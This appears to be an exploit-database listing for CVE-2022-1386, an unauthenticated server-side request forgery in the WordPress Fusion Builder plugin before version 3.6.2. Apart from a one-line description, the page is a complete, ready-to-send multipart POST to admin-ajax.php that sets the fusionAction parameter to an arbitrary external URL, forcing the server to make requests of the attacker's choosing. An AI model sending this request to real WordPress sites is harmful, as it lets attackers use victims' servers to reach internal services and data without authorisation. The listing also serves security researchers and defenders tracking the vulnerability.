Exploit for Fusion Builder < 3.6.2 - Unauthenticated SSRF CVE-2022-1386

Name: Exploit for Fusion Builder < 3.6.2 - Unauthenticated SSRF CVE-2022-1386
Rating: 5 (1179 reviews)
2022-04-19 | CVSS 7.5
## https://sploitus.com/exploit?id=WPEX-ID:BF7034AB-24C4-461F-A709-3F73988B536B
Attacker can control the URL (fusionAction parameter) and method (fusionActionMethod  parameter) of the HTTP request.

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------30259827232283860776499538268
Content-Length: 1457
Connection: close
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="formData"

email=aaa@bb.com&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval= 48&privacy_expiration_action=ignore&fusion-form-nonce-10361=e222df00dd&fusion-fields-hold-private-data= -----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="action"

fusion_form_submit_form_to_url
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="fusion_form_nonce"

e222df00dd
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="form_id"

10361
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="post_id"

8988
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="field_labels"

{"email":"Email address"}
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="hidden_field_names"

[]
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="fusionAction"

https://arbitrary.com/
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="fusionActionMethod"

post
-----------------------------30259827232283860776499538268—